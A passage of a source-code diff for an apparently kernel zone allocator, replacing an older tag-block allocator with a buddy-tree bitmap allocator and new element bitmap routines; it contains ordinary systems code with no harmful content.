+               struct zone_bits_chain *next = zba_chain_for_index(zbc->zbc_next);
+               if (next->zbc_prev != index) {
+                       zba_chain_corruption_panic(zbc, next);
                }
+               next->zbc_prev = zbc->zbc_prev;
        }
-       return result;
 }
 
-
-void __unused
-ztDump(boolean_t sanity);
-void __unused
-ztDump(boolean_t sanity)
+static vm_address_t
+zba_try_pop_block(uint32_t order)
 {
-       uint32_t q, cq, p;
+       struct zone_bits_head *hd = zba_head(order);
+       struct zone_bits_chain *zbc;
 
-       for (q = 0; q <= ztFreeIndexMax; q++) {
-               p = q;
-               do{
-                       if (sanity) {
-                               cq = ztLog2down(ztBlocks[p].size);
-                               if (cq > ztFreeIndexMax) {
-                                       cq = ztFreeIndexMax;
-                               }
-                               if (!ztBlocks[p].free
-                                   || ((p != q) && (q != cq))
-                                   || (ztBlocks[ztBlocks[p].next].prev != p)
-                                   || (ztBlocks[ztBlocks[p].prev].next != p)) {
-                                       kprintf("zterror at %d", p);
-                                       ztDump(FALSE);
-                                       kprintf("zterror at %d", p);
-                                       assert(FALSE);
-                               }
-                               continue;
-                       }
-                       kprintf("zt[%03d]%c %d, %d, %d\n",
-                           p, ztBlocks[p].free ? 'F' : 'A',
-                           ztBlocks[p].next, ztBlocks[p].prev,
-                           ztBlocks[p].size);
-                       p = ztBlocks[p].next;
-                       if (p == q) {
-                               break;
-                       }
-               }while (p != q);
-               if (!sanity) {
-                       printf("\n");
-               }
-       }
-       if (!sanity) {
-               printf("-----------------------\n");
+       if (hd->zbh_next == 0) {
+               return 0;
        }
+
+       zbc = zba_chain_for_index(hd->zbh_next);
+       zba_remove_block(zbc);
+       return (vm_address_t)zbc;
 }
 
+static struct zone_bits_allocator_header *
+zba_header(vm_offset_t addr)
+{
+       addr &= -(vm_offset_t)ZBA_CHUNK_SIZE;
+       return (struct zone_bits_allocator_header *)addr;
+}
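+
+/*
+ * The allocator manages each ZBA_CHUNK_SIZE chunk as an implicit binary
+ * buddy tree over ZBA_GRANULE-sized granules: node `n` has parent
+ * (n - 1) / 2, left child 2 * n + 1 and buddy ((n - 1) ^ 1) + 1.
+ * zbah_bits keeps one bit per node, toggled each time either of that
+ * node's children is allocated or freed, so a set bit effectively means
+ * exactly one of that node's two children is in use.
+ */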
 
+static size_t
+zba_node_parent(size_t node)
+{
+       return (node - 1) / 2;
+}
 
-#define ZTBDEQ(idx)                                                 \
-    ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next;     \
-    ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev;
+static size_t
+zba_node_left_child(size_t node)
+{
+       return node * 2 + 1;
+}
 
-static void
-ztFree(zone_t zone __unused, uint32_t index, uint32_t count)
+static size_t
+zba_node_buddy(size_t node)
 {
-       uint32_t q, w, p, size, merge;
+       return ((node - 1) ^ 1) + 1;
+}
 
-       assert(count);
-       ztBlocksFree += count;
+static size_t
+zba_node(vm_offset_t addr, uint32_t order)
+{
+       vm_offset_t offs = (addr % ZBA_CHUNK_SIZE) / ZBA_GRANULE;
+       return (offs >> order) + (1 << (ZBA_MAX_ORDER - order + 1)) - 1;
+}
 
-       // merge with preceding
-       merge = (index + count);
-       if ((merge < ztBlocksCount)
-           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
-           && ztBlocks[merge].free) {
-               ZTBDEQ(merge);
-               count += ztBlocks[merge].size;
-       }
-
-       // merge with following
-       merge = (index - 1);
-       if ((merge > ztFreeIndexMax)
-           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
-           && ztBlocks[merge].free) {
-               size = ztBlocks[merge].size;
-               count += size;
-               index -= size;
-               ZTBDEQ(index);
-       }
-
-       q = ztLog2down(count);
-       if (q > ztFreeIndexMax) {
-               q = ztFreeIndexMax;
-       }
-       w = q;
-       // queue in order of size
-       while (TRUE) {
-               p = ztBlocks[w].next;
-               if (p == q) {
-                       break;
-               }
-               if (ztBlocks[p].size >= count) {
-                       break;
-               }
-               w = p;
-       }
-       ztBlocks[p].prev = index;
-       ztBlocks[w].next = index;
-
-       // fault in first
-       ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
-
-       // mark first & last with free flag and size
-       ztBlocks[index].free = TRUE;
-       ztBlocks[index].size = count;
-       ztBlocks[index].prev = w;
-       ztBlocks[index].next = p;
-       if (count > 1) {
-               index += (count - 1);
-               // fault in last
-               ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
-               ztBlocks[index].free = TRUE;
-               ztBlocks[index].size = count;
-       }
+static struct zone_bits_chain *
+zba_chain_for_node(struct zone_bits_allocator_header *zbah, size_t node, uint32_t order)
+{
+       vm_offset_t offs = (node - (1 << (ZBA_MAX_ORDER - order + 1)) + 1) << order;
+       return (struct zone_bits_chain *)((vm_offset_t)zbah + offs * ZBA_GRANULE);
 }
 
-static uint32_t
-ztAlloc(zone_t zone, uint32_t count)
+static void
+zba_node_flip_split(struct zone_bits_allocator_header *zbah, size_t node)
 {
-       uint32_t q, w, p, leftover;
-
-       assert(count);
-
-       q = ztLog2up(count);
-       if (q > ztFreeIndexMax) {
-               q = ztFreeIndexMax;
-       }
-       do{
-               w = q;
-               while (TRUE) {
-                       p = ztBlocks[w].next;
-                       if (p == q) {
-                               break;
-                       }
-                       if (ztBlocks[p].size >= count) {
-                               // dequeue, mark both ends allocated
-                               ztBlocks[w].next = ztBlocks[p].next;
-                               ztBlocks[ztBlocks[p].next].prev = w;
-                               ztBlocks[p].free = FALSE;
-                               ztBlocksFree -= ztBlocks[p].size;
-                               if (ztBlocks[p].size > 1) {
-                                       ztBlocks[p + ztBlocks[p].size - 1].free = FALSE;
-                               }
-
-                               // fault all the allocation
-                               ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0);
-                               // mark last as allocated
-                               if (count > 1) {
-                                       ztBlocks[p + count - 1].free = FALSE;
-                               }
-                               // free remainder
-                               leftover = ztBlocks[p].size - count;
-                               if (leftover) {
-                                       ztFree(zone, p + ztBlocks[p].size - leftover, leftover);
-                               }
-
-                               return p;
-                       }
-                       w = p;
-               }
-               q++;
-       }while (q <= ztFreeIndexMax);
+       zbah->zbah_bits[node / 64] ^= 1ull << (node % 64);
+}
 
-       return -1U;
+static bool
+zba_node_is_split(struct zone_bits_allocator_header *zbah, size_t node)
+{
+       return zbah->zbah_bits[node / 64] & (1ull << (node % 64));
 }
 
-__startup_func
 static void
-zone_tagging_init(vm_size_t max_zonemap_size)
+zba_free(vm_offset_t addr, uint32_t order)
 {
-       kern_return_t         ret;
-       vm_map_kernel_flags_t vmk_flags;
-       uint32_t              idx;
-
-       // allocate submaps VM_KERN_MEMORY_DIAG
-
-       zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t);
-       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size,
-           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
-           &zone_tagbase_map);
+       struct zone_bits_allocator_header *zbah = zba_header(addr);
+       struct zone_bits_chain *zbc;
+       size_t node = zba_node(addr, order);
 
-       if (ret != KERN_SUCCESS) {
-               panic("zone_init: kmem_suballoc failed");
-       }
-       zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size);
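+       /*
+        * Walk up the tree: flipping the parent bit records this block's
+        * change of state.  If the bit is now set, the buddy is still in
+        * use and coalescing stops; if it is now clear, the buddy is free
+        * too, so unhook it from its freelist and merge one order up.
+        */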
+       while (node) {
+               size_t parent = zba_node_parent(node);
 
-       zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t);
-       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size,
-           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
-           &zone_tags_map);
+               zba_node_flip_split(zbah, parent);
+               if (zba_node_is_split(zbah, parent)) {
+                       break;
+               }
 
-       if (ret != KERN_SUCCESS) {
-               panic("zone_init: kmem_suballoc failed");
+               zbc = zba_chain_for_node(zbah, zba_node_buddy(node), order);
+               zba_remove_block(zbc);
+               order++;
+               node = parent;
        }
-       zone_tags_max = zone_tags_min + round_page(zone_tags_map_size);
-
-       ztBlocks = (ztBlock *) zone_tags_min;
-       ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock));
 
-       // initialize the qheads
-       lck_mtx_lock(&ztLock);
+       zba_push_block(zba_chain_for_node(zbah, node, order), order);
+}
 
-       ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0);
-       for (idx = 0; idx < ztFreeIndexCount; idx++) {
-               ztBlocks[idx].free = TRUE;
-               ztBlocks[idx].next = idx;
-               ztBlocks[idx].prev = idx;
-               ztBlocks[idx].size = 0;
+static vm_size_t
+zba_chunk_header_size(uint32_t n)
+{
+       vm_size_t hdr_size = sizeof(struct zone_bits_allocator_header);
+       if (n == 0) {
+               hdr_size += sizeof(struct zone_bits_allocator_meta);
        }
-       // free remaining space
-       ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount);
-
-       lck_mtx_unlock(&ztLock);
+       return hdr_size;
 }
 
 static void
-ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size)
+zba_init_chunk(uint32_t n)
 {
-       uint32_t * tagbase;
-       uint32_t   count, block, blocks, idx;
-       size_t     pages;
-
-       pages = atop(size);
-       tagbase = ZTAGBASE(zone, mem);
-
-       lck_mtx_lock(&ztLock);
+       vm_size_t hdr_size = zba_chunk_header_size(n);
+       vm_offset_t page = zba_page_addr(n);
+       struct zone_bits_allocator_header *zbah = zba_header(page);
+       vm_size_t size = ZBA_CHUNK_SIZE;
+       size_t node;
 
-       // fault tagbase
-       ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0);
-
-       if (!zone->tags_inline) {
-               // allocate tags
-               count = (uint32_t)(size / zone_elem_size(zone));
-               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
-               block = ztAlloc(zone, blocks);
-               if (-1U == block) {
-                       ztDump(false);
+       for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) {
+               if (size < hdr_size + (ZBA_GRANULE << o)) {
+                       continue;
                }
-               assert(-1U != block);
+               size -= ZBA_GRANULE << o;
+               node = zba_node(page + size, o);
+               zba_node_flip_split(zbah, zba_node_parent(node));
+               zba_push_block(zba_chain_for_node(zbah, node, o), o);
        }
 
-       lck_mtx_unlock(&ztLock);
-
-       if (!zone->tags_inline) {
-               // set tag base for each page
-               block *= ztTagsPerBlock;
-               for (idx = 0; idx < pages; idx++) {
-                       vm_offset_t esize = zone_elem_size(zone);
-                       tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize);
-               }
-       }
+       zba_meta()->zbam_chunks = n + 1;
 }
 
+__attribute__((noinline))
 static void
-ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size)
+zba_grow(void)
 {
-       uint32_t * tagbase;
-       uint32_t   count, block, blocks, idx;
-       size_t     pages;
-
-       // set tag base for each page
-       pages = atop(size);
-       tagbase = ZTAGBASE(zone, mem);
-       block = tagbase[0];
-       for (idx = 0; idx < pages; idx++) {
-               tagbase[idx] = 0xFFFFFFFF;
-       }
+       uint32_t chunk = zba_meta()->zbam_chunks;
 
-       lck_mtx_lock(&ztLock);
-       if (!zone->tags_inline) {
-               count = (uint32_t)(size / zone_elem_size(zone));
-               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
-               assert(block != 0xFFFFFFFF);
-               block /= ztTagsPerBlock;
-               ztFree(NULL /* zone is unlocked */, block, blocks);
+       zba_populate(chunk);
+       if (zba_meta()->zbam_chunks == chunk) {
+               zba_init_chunk(chunk);
        }
-
-       lck_mtx_unlock(&ztLock);
 }
 
-uint32_t
-zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size)
+static vm_offset_t
+zba_alloc(uint32_t order)
 {
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       struct zone_bits_allocator_header *zbah;
+       uint32_t cur = order;
+       vm_address_t addr;
+       size_t node;
 
-       zone_index_foreach(idx) {
-               zone_t z = &zone_array[idx];
-               if (!z->tags) {
-                       continue;
-               }
-               if (tag_zone_index != z->tag_zone_index) {
-                       continue;
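+       /*
+        * Find a free block of the smallest order >= the requested one;
+        * if every freelist up to ZBA_MAX_ORDER is empty, grow the arena
+        * and retry from the requested order.
+        */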
+       while ((addr = zba_try_pop_block(cur)) == 0) {
+               if (cur++ >= ZBA_MAX_ORDER) {
+                       zba_grow();
+                       cur = order;
                }
-
-               *elem_size = zone_elem_size(z);
-               simple_unlock(&all_zones_lock);
-               return idx;
        }
 
-       simple_unlock(&all_zones_lock);
+       zbah = zba_header(addr);
+       node = zba_node(addr, cur);
+       zba_node_flip_split(zbah, zba_node_parent(node));
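+       /*
+        * Split the block back down to the requested order, pushing the
+        * right-hand buddy of each split onto its freelist.
+        */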
+       while (cur > order) {
+               cur--;
+               zba_node_flip_split(zbah, node);
+               node = zba_node_left_child(node);
+               zba_push_block(zba_chain_for_node(zbah, node + 1, cur), cur);
+       }
 
-       return -1U;
+       return addr;
 }
 
-#endif /* VM_MAX_TAG_ZONES */
-#pragma mark zalloc helpers
+#define zba_map_index(type, n)    (n / (8 * sizeof(type)))
+#define zba_map_bit(type, n)      ((type)1 << (n % (8 * sizeof(type))))
+#define zba_map_mask_lt(type, n)  (zba_map_bit(type, n) - 1)
+#define zba_map_mask_ge(type, n)  ((type)-zba_map_bit(type, n))
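+// e.g. with type == uint32_t and n == 5:
+//   zba_map_index()    == 0
+//   zba_map_bit()      == 0x00000020
+//   zba_map_mask_lt()  == 0x0000001f   (bits below n)
+//   zba_map_mask_ge()  == 0xffffffe0   (bits at and above n)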
 
-const char *
-zone_name(zone_t z)
+#if !ZALLOC_TEST
+static uint32_t
+zba_bits_ref_order(uint32_t bref)
 {
-       return z->z_name;
+       return bref & 0x7;
 }
 
-const char *
-zone_heap_name(zone_t z)
+static bitmap_t *
+zba_bits_ref_ptr(uint32_t bref)
 {
-       if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) {
-               return kalloc_heap_names[z->kalloc_heap];
-       }
-       return "invalid";
+       return zba_slot_base() + (bref >> 3);
 }
 
-static inline vm_size_t
-zone_submaps_approx_size(void)
+static vm_offset_t
+zba_scan_bitmap_inline(zone_t zone, struct zone_page_metadata *meta,
+    vm_offset_t eidx)
 {
-       vm_size_t size = 0;
+       size_t i = eidx / 32;
+       uint32_t map;
 
-       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
-               size += zone_submaps[idx]->size;
+       if (eidx % 32) {
+               map = meta[i].zm_bitmap & zba_map_mask_ge(uint32_t, eidx);
+               if (map) {
+                       eidx = __builtin_ctz(map);
+                       meta[i].zm_bitmap ^= 1u << eidx;
+                       return i * 32 + eidx;
+               }
+               i++;
        }
 
-       return size;
-}
+       uint32_t chunk_len = meta->zm_chunk_len;
+       if (chunk_len == 1 && zone->z_percpu) {
+               chunk_len = zpercpu_count();
+       }
+       for (int j = 0; j < chunk_len; j++, i++) {
+               if (i >= chunk_len) {
+                       i = 0;
+               }
+               if (__probable(map = meta[i].zm_bitmap)) {
+                       meta[i].zm_bitmap &= map - 1;
+                       return i * 32 + __builtin_ctz(map);
+               }
+       }
 
-bool
-zone_maps_owned(vm_address_t addr, vm_size_t size)
-{
-       return from_zone_map(addr, size);
+       zone_page_meta_accounting_panic(zone, meta, "zm_bitmap");
 }
 
-void
-zone_map_sizes(
-       vm_map_size_t    *psize,
-       vm_map_size_t    *pfree,
-       vm_map_size_t    *plargest_free)
+static vm_offset_t
+zba_scan_bitmap_ref(zone_t zone, struct zone_page_metadata *meta,
+    vm_offset_t eidx)
 {
-       vm_map_sizes(zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP], psize, pfree, plargest_free);
-}
+       uint32_t bits_size = 1 << zba_bits_ref_order(meta->zm_bitmap);
+       bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+       size_t i = eidx / 64;
+       uint64_t map;
 
-vm_map_t
-zone_submap(zone_t zone)
-{
-       return submap_for_zone(zone);
+       if (eidx % 64) {
+               map = bits[i] & zba_map_mask_ge(uint64_t, eidx);
+               if (map) {
+                       eidx = __builtin_ctzll(map);
+                       bits[i] ^= 1ull << eidx;
+                       return i * 64 + eidx;
+               }
+               i++;
+       }
+
+       for (int j = 0; j < bits_size; i++, j++) {
+               if (i >= bits_size) {
+                       i = 0;
+               }
+               if (__probable(map = bits[i])) {
+                       bits[i] &= map - 1;
+                       return i * 64 + __builtin_ctzll(map);
+               }
+       }
+
+       zone_page_meta_accounting_panic(zone, meta, "zm_bitmap");
 }
 
-unsigned
-zpercpu_count(void)
+/*!
+ * @function zone_meta_find_and_clear_bit
+ *
+ * @brief
+ * The core of the bitmap allocator: find a bit set in the bitmaps.
+ *
+ * @discussion
+ * This method will round robin through available allocations,
+ * with a per-core memory of the last allocated element index.
+ *
+ * This is done in order to avoid a fully LIFO behavior which makes exploiting
+ * double-free bugs way too practical.
+ *
+ * @param zone          The zone we're allocating from.
+ * @param meta          The main metadata for the chunk being allocated from.
+ */
+static vm_offset_t
+zone_meta_find_and_clear_bit(zone_t zone, struct zone_page_metadata *meta)
 {
-       return zpercpu_early_count;
+       zone_stats_t zs = zpercpu_get(zone->z_stats);
+       vm_offset_t eidx = zs->zs_alloc_rr + 1;
+
+       if (meta->zm_inline_bitmap) {
+               eidx = zba_scan_bitmap_inline(zone, meta, eidx);
+       } else {
+               eidx = zba_scan_bitmap_ref(zone, meta, eidx);
+       }
+       zs->zs_alloc_rr = (uint16_t)eidx;
+       return eidx;
 }
 
-int
-track_this_zone(const char *zonename, const char *logname)
+/*!
+ * @function zone_meta_bits_init
+ *
+ * @brief
+ * Initializes the zm_bitmap field(s) for a newly assigned chunk.
+ *
+ * @param meta          The main metadata for the initialized chunk.
+ * @param count         The number of elements the chunk can hold
+ *                      (which might be partial for partially populated chunks).
+ * @param nbits         The maximum number of bits that will be used.
+ */
+static void
+zone_meta_bits_init(struct zone_page_metadata *meta,
+    uint32_t count, uint32_t nbits)
 {
-       unsigned int len;
-       const char *zc = zonename;
-       const char *lc = logname;
-
-       /*
-        * Compare the strings.  We bound the compare by MAX_ZONE_NAME.
-        */
+       static_assert(ZONE_MAX_ALLOC_SIZE / ZONE_MIN_ELEM_SIZE <=
+           ZBA_GRANULE_BITS << ZBA_MAX_ORDER, "bitmaps will be large enough");
 
-       for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) {
+       if (meta->zm_inline_bitmap) {
                /*
-                * If the current characters don't match, check for a space in
-                * in the zone name and a corresponding period in the log name.
-                * If that's not there, then the strings don't match.
+                * We're called with the metadata zm_bitmap fields already
+                * zeroed out.
                 */
-
-               if (*zc != *lc && !(*zc == ' ' && *lc == '.')) {
-                       break;
+               for (size_t i = 0; 32 * i < count; i++) {
+                       if (32 * i + 32 <= count) {
+                               meta[i].zm_bitmap = ~0u;
+                       } else {
+                               meta[i].zm_bitmap = zba_map_mask_lt(uint32_t, count);
+                       }
                }
+       } else {
+               uint32_t order = flsll((nbits - 1) / ZBA_GRANULE_BITS);
+               uint64_t *bits;
 
-               /*
-                * The strings are equal so far.  If we're at the end, then it's a match.
-                */
+               assert(order <= ZBA_MAX_ALLOC_ORDER);
+               assert(count <= ZBA_GRANULE_BITS << order);
 
-               if (*zc == '\0') {
-                       return TRUE;
+               zba_lock();
+               bits = (uint64_t *)zba_alloc(order);
+               zba_unlock();
+
+               for (size_t i = 0; i < 1u << order; i++) {
+                       if (64 * i + 64 <= count) {
+                               bits[i] = ~0ull;
+                       } else if (64 * i < count) {
+                               bits[i] = zba_map_mask_lt(uint64_t, count);
+                       } else {
+                               bits[i] = 0ull;
+                       }
                }
-       }
 
-       return FALSE;
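+               /*
+                * The reference packs the byte offset of the bitmap from
+                * zba_slot_base() with the order in the low 3 bits
+                * (the bitmap allocations are ZBA_GRANULE aligned, which
+                * leaves those bits free), matching zba_bits_ref_order()
+                * and zba_bits_ref_ptr() above.
+                */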
+               meta->zm_bitmap = (uint32_t)((vm_offset_t)bits -
+                   (vm_offset_t)zba_slot_base()) + order;
+       }
 }
 
-#if DEBUG || DEVELOPMENT
-
-vm_size_t
-zone_element_info(void *addr, vm_tag_t * ptag)
+/*!
+ * @function zone_meta_bits_merge
+ *
+ * @brief
+ * Adds elements <code>[start, end)</code> to a chunk being extended.
+ *
+ * @param meta          The main metadata for the extended chunk.
+ * @param start         The index of the first element to add to the chunk.
+ * @param end           The index past the last element to add (exclusive).
+ */
+static void
+zone_meta_bits_merge(struct zone_page_metadata *meta,
+    uint32_t start, uint32_t end)
 {
-       vm_size_t     size = 0;
-       vm_tag_t      tag = VM_KERN_MEMORY_NONE;
-       struct zone_page_metadata *meta;
-       struct zone *src_zone;
+       if (meta->zm_inline_bitmap) {
+               while (start < end) {
+                       size_t s_i = start / 32;
+                       size_t s_e = end / 32;
 
-       if (from_zone_map(addr, sizeof(void *))) {
-               meta = zone_native_meta_from_addr(addr);
-               src_zone = &zone_array[meta->zm_index];
-#if VM_MAX_TAG_ZONES
-               if (__improbable(src_zone->tags)) {
-                       tag = (ZTAG(src_zone, (vm_offset_t) addr)[0] >> 1);
+                       if (s_i == s_e) {
+                               meta[s_i].zm_bitmap |= zba_map_mask_lt(uint32_t, end) &
+                                   zba_map_mask_ge(uint32_t, start);
+                               break;
+                       }
+
+                       meta[s_i].zm_bitmap |= zba_map_mask_ge(uint32_t, start);
+                       start += 32 - (start % 32);
                }
-#endif /* VM_MAX_TAG_ZONES */
-               size = zone_elem_size(src_zone);
        } else {
-#if CONFIG_GZALLOC
-               gzalloc_element_size(addr, NULL, &size);
-#endif /* CONFIG_GZALLOC */
-       }
-       *ptag = tag;
-       return size;
-}
+               uint64_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
 
-#endif /* DEBUG || DEVELOPMENT */
+               while (start < end) {
+                       size_t s_i = start / 64;
+                       size_t s_e = end / 64;
 
-/* Someone wrote to freed memory. */
-__abortlike
-static void
-zone_element_was_modified_panic(
-       zone_t        zone,
-       vm_offset_t   element,
-       vm_offset_t   found,
-       vm_offset_t   expected,
-       vm_offset_t   offset)
-{
-       panic("a freed zone element has been modified in zone %s%s: "
-           "expected %p but found %p, bits changed %p, "
-           "at offset %d of %d in element %p, cookies %p %p",
-           zone_heap_name(zone),
-           zone->z_name,
-           (void *)   expected,
-           (void *)   found,
-           (void *)   (expected ^ found),
-           (uint32_t) offset,
-           (uint32_t) zone_elem_size(zone),
-           (void *)   element,
-           (void *)   zp_nopoison_cookie,
-           (void *)   zp_poisoned_cookie);
+                       if (s_i == s_e) {
+                               bits[s_i] |= zba_map_mask_lt(uint64_t, end) &
+                                   zba_map_mask_ge(uint64_t, start);
+                               break;
+                       }
+                       bits[s_i] |= zba_map_mask_ge(uint64_t, start);
+                       start += 64 - (start % 64);
+               }
+       }
 }
 
-/* The backup pointer is stored in the last pointer-sized location in an element. */
-__header_always_inline vm_offset_t *
-get_backup_ptr(vm_size_t elem_size, vm_offset_t *element)
+/*!
+ * @function zone_bits_free
+ *
+ * @brief
+ * Frees a bitmap to the zone bitmap allocator.
+ *
+ * @param bref
+ * A bitmap reference set by @c zone_meta_bits_init() in a @c zm_bitmap field.
+ */
+static void
+zone_bits_free(uint32_t bref)
 {
-       return (vm_offset_t *)((vm_offset_t)element + elem_size - sizeof(vm_offset_t));
+       zba_lock();
+       zba_free((vm_offset_t)zba_bits_ref_ptr(bref), zba_bits_ref_order(bref));
+       zba_unlock();
 }
 
-/*
- * The primary and backup pointers don't match.
- * Determine which one was likely the corrupted pointer, find out what it
- * probably should have been, and panic.
+/*!
+ * @function zone_meta_is_free
+ *
+ * @brief
+ * Returns whether a given element appears free.
  */
-__abortlike
-static void
-backup_ptr_mismatch_panic(
-       zone_t        zone,
-       struct zone_page_metadata *page_meta,
-       vm_offset_t   page,
-       vm_offset_t   element)
-{
-       vm_offset_t primary = *(vm_offset_t *)element;
-       vm_offset_t backup  = *get_backup_ptr(zone_elem_size(zone), &element);
-       vm_offset_t likely_backup;
-       vm_offset_t likely_primary;
-       zone_addr_kind_t kind = zone_addr_kind(page, zone_elem_size(zone));
-
-       likely_primary = primary ^ zp_nopoison_cookie;
-       boolean_t   sane_backup;
-       boolean_t   sane_primary = zone_page_meta_is_sane_element(zone, page_meta,
-           page, likely_primary, kind);
-       boolean_t   element_was_poisoned = (backup & 0x1);
-
-#if defined(__LP64__)
-       /* We can inspect the tag in the upper bits for additional confirmation */
-       if ((backup & 0xFFFFFF0000000000) == 0xFACADE0000000000) {
-               element_was_poisoned = TRUE;
-       } else if ((backup & 0xFFFFFF0000000000) == 0xC0FFEE0000000000) {
-               element_was_poisoned = FALSE;
-       }
-#endif
-
-       if (element_was_poisoned) {
-               likely_backup = backup ^ zp_poisoned_cookie;
+static bool
+zone_meta_is_free(struct zone_page_metadata *meta, zone_element_t ze)
+{
+       vm_offset_t eidx = zone_element_idx(ze);
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               return meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit;
        } else {
-               likely_backup = backup ^ zp_nopoison_cookie;
-       }
-       sane_backup = zone_page_meta_is_sane_element(zone, page_meta,
-           page, likely_backup, kind);
-
-       /* The primary is definitely the corrupted one */
-       if (!sane_primary && sane_backup) {
-               zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
-       }
-
-       /* The backup is definitely the corrupted one */
-       if (sane_primary && !sane_backup) {
-               zone_element_was_modified_panic(zone, element, backup,
-                   (likely_primary ^ (element_was_poisoned ? zp_poisoned_cookie : zp_nopoison_cookie)),
-                   zone_elem_size(zone) - sizeof(vm_offset_t));
-       }
-
-       /*
-        * Not sure which is the corrupted one.
-        * It's less likely that the backup pointer was overwritten with
-        * ( (sane address) ^ (valid cookie) ), so we'll guess that the
-        * primary pointer has been overwritten with a sane but incorrect address.
-        */
-       if (sane_primary && sane_backup) {
-               zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               return bits[zba_map_index(uint64_t, eidx)] & bit;
        }
-
-       /* Neither are sane, so just guess. */
-       zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
 }
 
-/*
- * zone_sequestered_page_get
- * z is locked
+/*!
+ * @function zone_meta_mark_free
+ *
+ * @brief
+ * Marks an element as free and returns whether it was marked as used.
  */
-static struct zone_page_metadata *
-zone_sequestered_page_get(zone_t z, vm_offset_t *page)
+static bool
+zone_meta_mark_free(struct zone_page_metadata *meta, zone_element_t ze)
 {
-       const zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
+       vm_offset_t eidx = zone_element_idx(ze);
 
-       if (!zone_pva_is_null(z->pages_sequester)) {
-               if (os_sub_overflow(z->sequester_page_count, z->alloc_pages,
-                   &z->sequester_page_count)) {
-                       zone_accounting_panic(z, "sequester_page_count wrap-around");
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) {
+                       return false;
+               }
+               meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit;
+       } else {
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               if (bits[zba_map_index(uint64_t, eidx)] & bit) {
+                       return false;
                }
-               return zone_meta_queue_pop(z, &z->pages_sequester, kind, page);
+               bits[zba_map_index(uint64_t, eidx)] ^= bit;
        }
-
-       return NULL;
+       return true;
 }
 
-/*
- * zone_sequestered_page_populate
- * z is unlocked
- * page_meta is invalid on failure
+/*!
+ * @function zone_meta_mark_used
+ *
+ * @brief
+ * Marks an element as used and returns whether it was marked as free.
  */
-static kern_return_t
-zone_sequestered_page_populate(zone_t z, struct zone_page_metadata *page_meta,
-    vm_offset_t space, vm_size_t alloc_size, int zflags)
+static bool
+zone_meta_mark_used(struct zone_page_metadata *meta, zone_element_t ze)
 {
-       kern_return_t retval;
+       vm_offset_t eidx = zone_element_idx(ze);
 
-       assert(alloc_size == ptoa(z->alloc_pages));
-       retval = kernel_memory_populate(submap_for_zone(z), space, alloc_size,
-           zflags, VM_KERN_MEMORY_ZONE);
-       if (retval != KERN_SUCCESS) {
-               lock_zone(z);
-               zone_meta_queue_push(z, &z->pages_sequester, page_meta, ZONE_ADDR_NATIVE);
-               z->sequester_page_count += z->alloc_pages;
-               unlock_zone(z);
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) {
+                       meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit;
+                       return true;
+               }
+       } else {
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               if (bits[zba_map_index(uint64_t, eidx)] & bit) {
+                       bits[zba_map_index(uint64_t, eidx)] ^= bit;
+                       return true;
+               }
        }
-       return retval;
+       return false;
 }
 
-#pragma mark Zone poisoning/zeroing
-
+#endif /* !ZALLOC_TEST */
